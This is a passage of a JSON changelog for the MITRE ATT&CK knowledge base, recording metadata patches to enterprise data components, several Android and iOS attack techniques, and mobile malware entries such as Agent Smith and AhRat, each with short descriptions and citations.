"Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.783Z\", \"old_value\": \"2025-04-16T20:39:08.970Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:48.777Z", + "name": "Image Modification", + "description": "Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:48.777Z\", \"old_value\": \"2025-04-18T15:16:02.863Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:48:42.003Z", + "name": "Instance Metadata", + "description": "Contextual data about an instance and activity around it such as name, type, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:48:42.003Z\", \"old_value\": \"2025-04-18T15:13:01.557Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:59.118Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:59.118Z\", \"old_value\": \"2025-04-18T15:12:23.075Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:56.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:56.271Z\", \"old_value\": \"2025-04-18T15:11:39.543Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.137Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.137Z\", \"old_value\": \"2025-04-18T15:10:51.004Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:42.387Z", + "name": "Snapshot Metadata", + "description": "Contextual data about a snapshot, which may include information such as ID, type, and status", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:42.387Z\", \"old_value\": \"2025-04-18T15:15:14.954Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:17.060Z", + "name": "User Account Metadata", + "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:17.060Z\", \"old_value\": \"2025-04-18T15:09:47.932Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--ec225357-8197-47a4-a9cd-57741d592877", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:47.887Z", + "name": "Volume Enumeration", + "description": "An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:47.887Z\", \"old_value\": \"2025-04-18T15:17:22.350Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:38.106Z", + "name": "Volume Metadata", + "description": "Contextual data about a cloud volume and activity around it, such as id, type, state, and size", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:38.106Z\", \"old_value\": \"2025-04-18T15:17:15.849Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:35.774Z", + "name": "Volume Modification", + "description": "Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:35.774Z\", \"old_value\": \"2025-04-18T15:17:12.667Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:08.104Z", + "name": "Web Credential Creation", + "description": "Initial construction of new web credential material (ex: Windows EID 1200 or 4769)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:08.104Z\", \"old_value\": \"2025-04-18T15:13:30.118Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:48:47.351Z", + "name": "Web Credential Usage", + "description": "An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:48:47.351Z\", \"old_value\": \"2025-04-18T15:13:26.927Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "mobile-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-07 15:24:49.068000+00:00", + "modified": "2025-04-25 15:16:40.355000+00:00", + "name": "Compromise Application Executable", + "description": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.\n\nThere are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file's signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user's knowledge.(Citation: Guardsquare Janus)\n\nAdversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)\n\nAdversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1577", + "external_id": "T1577" + }, + { + "source_name": "Guardsquare Janus", + "description": "Guarsquare. (2017, November 13). New Android vulnerability allows attackers to modify apps without affecting their signatures. Retrieved May 7, 2020.", + "url": "https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "This behavior is seamless to the user and is typically undetectable.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:40.355000+00:00\", \"old_value\": \"2025-04-16 21:21:56.351000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1001: Security Updates", + "M1006: Use Recent OS Version" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-24 14:47:34.182000+00:00", + "modified": "2025-04-25 15:16:39.824000+00:00", + "name": "Hooking", + "description": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1617", + "external_id": "T1617" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:39.824000+00:00\", \"old_value\": \"2025-04-16 21:21:55.543000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1002: Attestation", + "M1010: Deploy Compromised Device Detection Method" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-04 16:43:31.619000+00:00", + "modified": "2025-04-25 15:16:26.617000+00:00", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:26.617000+00:00\", \"old_value\": \"2025-04-16 21:21:43.650000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:47.965000+00:00", + "modified": "2025-04-25 14:40:25.685000+00:00", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:25.685000+00:00\", \"old_value\": \"2025-04-16 21:22:08.276000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:47.038000+00:00", + "modified": "2025-04-25 14:40:45.642000+00:00", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:45.642000+00:00\", \"old_value\": \"2025-04-16 21:22:15.993000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-07 15:18:34.417000+00:00", + "modified": "2025-04-25 14:40:35.302000+00:00", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440", + "external_id": "S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:35.302000+00:00\", \"old_value\": \"2025-04-16 21:22:11.884000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--24c8f6db-71e0-41ef-a1dc-83399a5b17e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-12-18 19:00:02.259000+00:00", + "modified": "2025-04-22 21:22:24.938000+00:00", + "name": "AhRat", + "description": "[AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, \u201ciRecorder \u2013 Screen Recorder,\u201d which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1095", + "external_id": "S1095" + }, + { + "source_name": "welivesecurity_ahrat_0523", + "description": "Lukas Stefanko. (2023, May 23). Android app breaking bad: From legitimate screen recording to file exfiltration within a year. Retrieved December 18, 2023.", + "url": "https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/" + } + ], + "object_marking_refs": [ + 